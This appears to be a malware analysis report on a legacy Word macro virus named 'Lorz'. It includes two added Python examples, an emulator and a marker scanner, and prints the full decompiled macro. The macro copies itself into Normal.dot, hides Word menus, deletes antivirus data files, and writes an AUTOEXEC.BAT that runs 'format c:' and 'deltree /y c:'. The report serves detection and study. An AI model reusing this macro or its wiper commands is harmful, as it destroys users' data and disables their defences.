Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 914f2070f9ff7504…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 2000-12-09 21:05:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b9d475c5df9601ebb78e0685a03cc56d
SHA-1: 2fab724620394252ef4e736216932c70af26b0c5
SHA-256: 914f2070f9ff75043c67a6ce3922e1aa65c0d104b77e4bb6027f1451009838d3
Risk score: 188

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1562.001 Impair Defenses: Disable or Modify Tools (added from the antivirus file deletion in the extracted macro)
  • T1485 Data Destruction (added from the format/deltree batch the macro writes to AUTOEXEC.BAT)

The sample is a Word document carrying a legacy WordBasic-style macro virus (it names itself "Lorz" and "AKP" in its payload text) with an AutoOpen auto-execution macro. AutoOpen first sets ToolsOptionsSave .GlobalDotPrompt = 0, which suppresses Word's prompt to save changes to the global template, and then uses MacroCopy to install the virus into the global template (Normal.dot): it copies a macro named Lorz over Global:FileSaveAs and its own AutoOpen over Global:Lorz, so the code runs again whenever a document is saved from the infected installation. The ToolsMacro subroutine replaces the built-in Tools > Macro command and deletes the Macro, Customize... and Templates and Add-Ins... entries from the Tools menu and Toolbars from the View menu, hiding the macros from the user; it does not touch antivirus files.

The antivirus tampering is in Sub Rolz(). For each of 'C:\Program Files\Norton AntiVirus\Virscan.Dat', 'C:\Program Files\F-Prot95\Fpwm32.dll', 'C:\Program Files\McAfee\Scan.dat' and 'C:\Tbavw95\Tbscan.sig' it clears the file attributes with SetAttr, deletes the file with Kill, and appends a fallback line of the form "IF exist <path> then del <path>" to C:\Autoexec.bat. That fallback is not valid COMMAND.COM syntax (IF EXIST takes no THEN), so it would fail at boot; the direct Kill is the part that works. Rolz then evaluates a date gate and, when it is satisfied, renames AUTOEXEC.BAT to AUTOEXEC.AAV and writes a new AUTOEXEC.BAT that runs 'echo y|format c: /u /v:AAV' and 'deltree /y c:' at the next boot. This destructive payload is consistent with the ClamAV name Dos.Trojan.FormatC.

Two details matter for assessment. The gate is mistyped as Month(Now() = 7) rather than Month(Now()) = 7; as VBA evaluates it the month term is a non-zero constant, so the condition reduces to the day of the month being 8 and the payload is not confined to July as the author evidently intended. The module also defines Rolz while AutoOpen copies a macro named Lorz, so either the decompiled module is incomplete or the installation step fails on this copy. Nothing is obfuscated: every path and command is a plaintext string literal.
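To read the effective behaviour of Rolz off the decompiled source without detonating the sample, the following added Python example (ours, not code from the sample or from the report's tooling) emulates its file operations against a dictionary-based virtual drive and evaluates the mistyped date gate the way VBA would. VirtualFS, emulate_rolz, trigger_fires and demo are names introduced here; the paths and batch text are copied from the macro, and the victim layout in demo is constructed.

```python
"""Emulate Sub Rolz() from the extracted macro against a virtual file system.

Added example for this report; not code from the sample or from any analysis
tool.  It re-implements the control flow visible in the decompiled Rolz
routine: SetAttr/Kill of four antivirus data files, the fallback lines
appended to C:\\Autoexec.bat after each attempt, and the date-gated
replacement of AUTOEXEC.BAT with the format/deltree batch.
"""
import datetime as dt
from dataclasses import dataclass, field

# Copied from the decompiled macro.
AV_FILES = [
    r"C:\Program Files\Norton AntiVirus\Virscan.Dat",
    r"C:\Program Files\F-Prot95\Fpwm32.dll",
    r"C:\Program Files\McAfee\Scan.dat",
    r"C:\Tbavw95\Tbscan.sig",
]
AUTOEXEC = r"C:\Autoexec.bat"
AUTOEXEC_BACKUP = r"C:\AUTOEXEC.AAV"
WIPER_BAT = [
    "@Echo off",
    "cls",
    "echo I have just entered your ass:",
    "echo         MS-WINDOWS",
    "echo Lorz has been in for awhile   ",
    "echo                --AKP--",
    "echo y|format c: /u /v:AAV >nul",
    "deltree /y c: >nul",
]


@dataclass
class VirtualFS:
    """Lower-cased path -> text content, standing in for the victim's C: drive."""
    files: dict
    killed: list = field(default_factory=list)

    def exists(self, path):                  # Files$(path) <> ""
        return path.lower() in self.files

    def kill(self, path):                    # SetAttr path, 0 : Kill path
        self.killed.append(path)
        del self.files[path.lower()]

    def append(self, path, line):            # Open path For Append : Print #1, line
        self.files[path.lower()] += line + "\r\n"

    def replace(self, old, backup, lines):   # Name old As backup : Open old For Output
        self.files[backup.lower()] = self.files.pop(old.lower())
        self.files[old.lower()] = "".join(l + "\r\n" for l in lines)


def trigger_fires(now: dt.date) -> bool:
    """Evaluate `Day(Now()) = 8 And Month(Now() = 7)` the way VBA does.

    The month test is mistyped: `Now() = 7` is evaluated first and is False
    (0); Month(0) is 12 because date serial 0 is 30 Dec 1899; and `And` is
    bitwise, so True (-1) And 12 = 12, which is non-zero.  The gate therefore
    depends on the day of the month only.  This is our reading of VBA
    semantics, not a statement made elsewhere in the report.
    """
    day_is_8 = -1 if now.day == 8 else 0
    month_of_false = 12
    return (day_is_8 & month_of_false) != 0


def emulate_rolz(fs: VirtualFS, now: dt.date) -> dict:
    """Run the Rolz logic against fs and report what it changed."""
    for i, vf in enumerate(AV_FILES):
        if fs.exists(vf):
            fs.kill(vf)
        # Each block falls through to its Autoexec.bat append whether or not
        # the AV file existed, so the batch line is written either way.  The
        # line is "IF exist X then del X", which COMMAND.COM does not accept.
        if fs.exists(AUTOEXEC):
            if i == 0:
                fs.append(AUTOEXEC, "@echo off")
            fs.append(AUTOEXEC, f"IF exist {vf} then del {vf}")
    wiper = False
    if trigger_fires(now) and fs.exists(AUTOEXEC):  # Name would error if absent
        fs.replace(AUTOEXEC, AUTOEXEC_BACKUP, WIPER_BAT)
        wiper = True
    return {"killed": list(fs.killed),
            "autoexec": fs.files.get(AUTOEXEC.lower(), ""),
            "wiper_installed": wiper}


def demo(year: int, month: int, day: int) -> dict:
    """Constructed victim: Norton and ThunderByte data files present, F-Prot
    and McAfee absent, a two-line AUTOEXEC.BAT."""
    fs = VirtualFS({
        AV_FILES[0].lower(): "sigs",
        AV_FILES[3].lower(): "sigs",
        AUTOEXEC.lower(): "@ECHO OFF\r\nPATH C:\\DOS\r\n",
    })
    return emulate_rolz(fs, dt.date(year, month, day))


if __name__ == "__main__":
    for ymd in ((2000, 7, 8), (2000, 3, 8), (2000, 7, 9)):
        r = demo(*ymd)
        print(ymd, "killed:", len(r["killed"]), "wiper installed:", r["wiper_installed"])
```

Running the demo for 8 July, 8 March and 9 July shows the point of the gate analysis: the two files that exist are deleted on every run, four fallback lines are appended on every run, and the format/deltree batch is installed on the 8th of either month but not on the 9th.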

Heuristics (4)

  • ClamAV: Dos.Trojan.FormatC-59 (severity: critical; rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Dos.Trojan.FormatC-59
  • Legacy WordBasic macro-virus markers (severity: high; rule OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. Word 6/95 macros are not stored as a modern VBA project, so extraction that relies on parsing the VBA project can miss them. In this sample Word 8.0 has converted the macros into a VBA project, which is why olevba could extract them, but the module still consists of WordBasic-era statements (MacroCopy, ToolsOptionsSave, Files$, DocMinimize).
  • VBA macros detected (severity: medium; rule OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: low; rule OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
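The legacy-marker heuristic above warns that Word 6/95 macro forms need not appear as a VBA project. The following added Python example (ours, not olevba or ClamAV code) shows the raw-byte approach such a check takes: it scans any carved stream or whole file for the marker families the heuristics name (auto-execution names, MacroCopy/Global: self-replication, redefined built-in commands such as ToolsMacro, antivirus-path and Autoexec.bat tampering, format/deltree) in both 8-bit and UTF-16LE encodings and returns a verdict. The marker lists and the verdict rule are our own choices, and SAMPLE_SOURCE is a constructed excerpt of the macro shown later on this page.

```python
"""Raw-byte triage for legacy WordBasic macro-virus markers.

Added example; not code from olevba, ClamAV or any other tool used in this
report.  Works on raw bytes (a carved stream or the whole OLE file) and looks
for every marker in both 8-bit and UTF-16LE form, so it does not depend on a
VBA project being parsed.  Marker lists and verdict rule are this example's own.
"""
import re

# Category -> marker strings.  Matching is case-insensitive.  builtin_override
# entries carry a "Sub " prefix so a string literal such as "Global:FileSaveAs"
# is not mistaken for a redefined built-in command.
MARKERS = {
    "auto_exec":        ["AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit"],
    "self_replication": ["MacroCopy", "Global:"],
    "builtin_override": ["Sub ToolsMacro", "Sub FileSaveAs", "Sub FileSave", "Sub FileTemplates"],
    "ui_tampering":     ["CommandBars", "ToolsOptionsSave", "GlobalDotPrompt"],
    "av_tampering":     ["Norton AntiVirus", "F-Prot", "McAfee", "Tbscan"],
    "boot_tampering":   ["Autoexec.bat"],
    "destructive":      ["format c:", "deltree"],
}


def _patterns(marker: str) -> list:
    """Compile the 8-bit and UTF-16LE forms of marker.  Identifier-like markers
    get word boundaries so that e.g. AutoExec does not fire on Autoexec.bat."""
    low = marker.lower()
    pats = []
    for enc, pre, post in (("latin-1", rb"(?<![a-z0-9_])", rb"(?![a-z0-9_.])"),
                           ("utf-16-le", rb"(?<![a-z0-9_]\x00)", rb"(?![a-z0-9_.]\x00)")):
        body = re.escape(low.encode(enc))
        head = pre if low[0].isalnum() else b""
        tail = post if low[-1].isalnum() else b""
        pats.append(re.compile(head + body + tail))
    return pats


def find_markers(blob: bytes) -> dict:
    """Map category -> markers found in blob, in MARKERS order."""
    low = blob.lower()   # bytes.lower() folds ASCII letters and leaves \x00 alone
    hits = {}
    for category, names in MARKERS.items():
        found = [n for n in names if any(p.search(low) for p in _patterns(n))]
        if found:
            hits[category] = found
    return hits


def verdict(hits: dict) -> str:
    """Mirror the report's heuristic: auto-execution plus a spreading mechanism
    marks a macro virus; a payload category upgrades the verdict."""
    auto = "auto_exec" in hits
    spreads = "self_replication" in hits or "builtin_override" in hits
    payload = any(c in hits for c in ("av_tampering", "boot_tampering", "destructive"))
    if auto and spreads and payload:
        return "legacy_wordbasic_macro_virus_with_payload"
    if auto and spreads:
        return "legacy_wordbasic_macro_virus"
    if auto:
        return "auto_exec_macro"
    return "no_macro_markers"


def triage(blob: bytes) -> dict:
    hits = find_markers(blob)
    return {"verdict": verdict(hits), "hits": hits}


# Constructed excerpt of the decompiled macro shown in the preview below.
SAMPLE_SOURCE = """Sub AutoOpen()
ToolsOptionsSave .GlobalDotPrompt = 0
m$ = FileName$() + ":Lorz"
MacroCopy m$, "Global:FileSaveAs"
End Sub
Sub ToolsMacro()
CommandBars("tools").Controls("Macro").Delete
End Sub
Sub Rolz()
VF$ = "C:\\Program Files\\Norton AntiVirus\\Virscan.Dat"
Kill VF$
AB$ = "C:\\Autoexec.bat"
Print #1, "echo y|format c: /u /v:AAV >nul"
End Sub
"""

if __name__ == "__main__":
    for label, blob in (("8-bit", SAMPLE_SOURCE.encode("latin-1")),
                        ("UTF-16LE", SAMPLE_SOURCE.encode("utf-16-le"))):
        print(label, triage(blob))
```

Both encodings of the excerpt produce the same hit set and the top verdict; a document with only Sub AutoOpen() and no spreading or payload markers is reported as an auto-exec macro rather than a macro virus, and ordinary mail text yields no markers at all.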

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10007 bytes
SHA-256: 22e2f27171e231384ce465f1f2410d1227f2078eb4263dd1a5462ebb785537c6
Detection: ClamAV: Dos.Trojan.FormatC-59
Obfuscation or encoded payload: unlikely (every path and command is a plaintext literal; the destructive batch is written in clear in Sub Rolz below)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Модуль1"
Sub AutoOpen()

ToolsOptionsSave .GlobalDotPrompt = 0
m$ = FileName$() + ":Lorz"
MacroCopy m$, "Global:FileSaveAs"
m$ = FileName$() + ":AutoOpen"
MacroCopy m$, "Global:Lorz"

End Sub

Sub ToolsMacro()

CommandBars("tools").Controls("Macro").Delete
           CommandBars("tools").Controls("Customize...").Delete
           CommandBars("tools").Controls("Templates and Add-Ins...").Delete
           CommandBars("view").Controls("Toolbars").Delete
End Sub

Sub Rolz()


On Error GoTo a
  VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"

 If Files$(VF$) = "" Then GoTo a
 SetAttr VF$, 0
 Kill VF$

a:
 On Error GoTo c
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo c
 SetAttr AB$, 0

 Open AB$ For Append As #1
  Print #1, "@echo off"
  Print #1, "IF exist " + VF$ + " then del " + VF$

  Close #1


c:
 On Error GoTo d
  VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
 If Files$(VF$) = "" Then GoTo d
 SetAttr VF$, 0
 Kill VF$

d:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo f
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1


f:

 On Error GoTo g
  VF$ = "C:\Program Files\McAfee\Scan.dat"
 If Files$(VF$) = "" Then GoTo g
 SetAttr VF$, 0
 Kill VF$

g:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo h
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1

h:

 On Error GoTo i
  VF$ = "C:\Tbavw95\Tbscan.sig"
 If Files$(VF$) = "" Then GoTo i
 SetAttr VF$, 0
 Kill VF$

i:
  AB$ = "C:\Autoexec.bat"
 If Files$(AB$) = "" Then GoTo J
 SetAttr AB$, 0
 Open AB$ For Append As #1
  Print #1, "IF exist " + VF$ + " then del " + VF$
  Close #1


J:
If Day(Now()) = 8 And Month(Now() = 7) Then
        SetAttr "C:\AUTOEXEC.BAT", 0
        Name "C:\AUTOEXEC.BAT" As "C:\AUTOEXEC.AAV"
        Open "C:\AUTOEXEC.BAT" For Output As #1
        Print #1, "@Echo off"
        Print #1, "cls"
        Print #1, "echo I have just entered your ass:"
        Print #1, "echo         MS-WINDOWS"
        Print #1, "echo Lorz has been in for awhile   "
        Print #1, "echo                --AKP--"
        Print #1, "echo y|format c: /u /v:AAV >nul"
        Print #1, "deltree /y c: >nul"
        Close #1
        dsk$ = Left$(DefaultDir$(9), 3)
        DocMinimize

Z:


' Processing file: /tmp/qstore_z66ja428
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Модуль1 - 5287 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' 	MemLdWith GlobalDotPrompt 
' 	LitDI2 0x0000 
' 	Eq 
' 	ArgsCall ToolsOptionsSave 0x0001 
' Line #3:
' 	ArgsLd FileName$ 0x0000 
' 	LitStr 0x0005 ":Lorz"
' 	Add 
' 	St m$ 
' Line #4:
' 	Ld m$ 
' 	LitStr 0x0011 "Global:FileSaveAs"
' 	ArgsCall MacroCopy 0x0002 
' Line #5:
' 	ArgsLd FileName$ 0x0000 
' 	LitStr 0x0009 ":AutoOpen"
' 	Add 
' 	St m$ 
' Line #6:
' 	Ld m$ 
' 	LitStr 0x000B "Global:Lorz"
' 	ArgsCall MacroCopy 0x0002 
' Line #7:
' Line #8:
' 	EndSub 
' Line #9:
' Line #10:
' 	FuncDefn (Sub ToolsMacro())
' Line #11:
' Line #12:
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #13:
' 	LitStr 0x000C "Customize..."
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #14:
' 	LitStr 0x0018 "Templates and Add-Ins..."
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #15:
' 	LitStr 0x0008 "Toolbars"
' 	LitStr 0x0004 "view"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #16:
' 	EndSub 
' Line #17:
' Line #18:
' 	FuncDefn (Sub Rolz())
' Line #19:
' Line #20:
' Line #21:
' 	OnError a 
' Line #22:
' 	LitStr 0x002D "C:\Program Files\Norton AntiVirus\Virscan.Dat"
' 	St VF$ 
' Line #23:
' Line #24:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo a 
' 	EndIf 
' Line #25:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #26:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #27:
' Line #28:
' 	Label a 
' Line #29:
' 	OnError c 
' Line #30:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #31:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo c 
' 	EndIf 
' Line #32:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #33:
' Line #34:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #35:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "@echo off"
' 	PrintItemNL 
' Line #36:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #37:
' Line #38:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #39:
' Line #40:
' Line #41:
' 	Label c 
' Line #42:
' 	OnError d 
' Line #43:
' 	LitStr 0x0024 "C:\Program Files\F-Prot95\Fpwm32.dll"
' 	St VF$ 
' Line #44:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo d 
' 	EndIf 
' Line #45:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #46:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #47:
' Line #48:
' 	Label d 
' Line #49:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #50:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo False 
' 	EndIf 
' Line #51:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #52:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #53:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #54:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #55:
' Line #56:
' Line #57:
' 	Label False 
' Line #58:
' Line #59:
' 	OnError g 
' Line #60:
' 	LitStr 0x0020 "C:\Program Files\McAfee\Scan.dat"
' 	St VF$ 
' Line #61:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo g 
' 	EndIf 
' Line #62:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #63:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #64:
' Line #65:
' 	Label g 
' Line #66:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #67:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo h 
' 	EndIf 
' Line #68:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #69:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #70:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #71:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #72:
' Line #73:
' 	Label h 
' Line #74:
' Line #75:
' 	OnError i 
' Line #76:
' 	LitStr 0x0015 "C:\Tbavw95\Tbscan.sig"
' 	St VF$ 
' Line #77:
' 	Ld VF$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo i 
' 	EndIf 
' Line #78:
' 	Ld VF$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #79:
' 	Ld VF$ 
' 	ArgsCall Kill 0x0001 
' Line #80:
' Line #81:
' 	Label i 
' Line #82:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	St AB$ 
' Line #83:
' 	Ld AB$ 
' 	ArgsLd Files$ 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo J 
' 	EndIf 
' Line #84:
' 	Ld AB$ 
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #85:
' 	Ld AB$ 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Append)
' Line #86:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "IF exist "
' 	Ld VF$ 
' 	Add 
' 	LitStr 0x000A " then del "
' 	Add 
' 	Ld VF$ 
' 	Add 
' 	PrintItemNL 
' Line #87:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #88:
' Line #89:
' Line #90:
' 	Label J 
' Line #91:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0008 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	LitDI2 0x0007 
' 	Eq 
' 	ArgsLd Month 0x0001 
' 	And 
' 	IfBlock 
' Line #92:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitDI2 0x0000 
' 	ArgsCall SetAttr 0x0002 
' Line #93:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitStr 0x000F "C:\AUTOEXEC.AAV"
' 	Name 
' Line #94:
' 	LitStr 0x000F "C:\AUTOEXEC.BAT"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #95:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0009 "@Echo off"
' 	PrintItemNL 
' Line #96:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0003 "cls"
' 	PrintItemNL 
' Line #97:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0022 "echo I have just entered your ass:"
' 	PrintItemNL 
' Line #98:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0017 "echo         MS-WINDOWS"
' 	PrintItemNL 
' Line #99:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0023 "echo Lorz has been in for awhile   "
' 	PrintItemNL 
' Line #100:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001B "echo                --AKP--"
' 	PrintItemNL 
' Line #101:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x001F "echo y|format c: /u /v:AAV >nul"
' 	PrintItemNL 
' Line #102:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0012 "deltree /y c: >nul"
' 	PrintItemNL 
' Line #103:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #104:
' 	LitDI2 0x0009 
' 	ArgsLd DefaultDir$ 0x0001 
' 	LitDI2 0x0003 
' 	ArgsLd LBound$ 0x0002 
' 	St dsk$ 
' Line #105:
' 	ArgsCall DocMinimize 0x0000 
' Line #106:
' Line #107:
' 	Label Z 
' Line #108: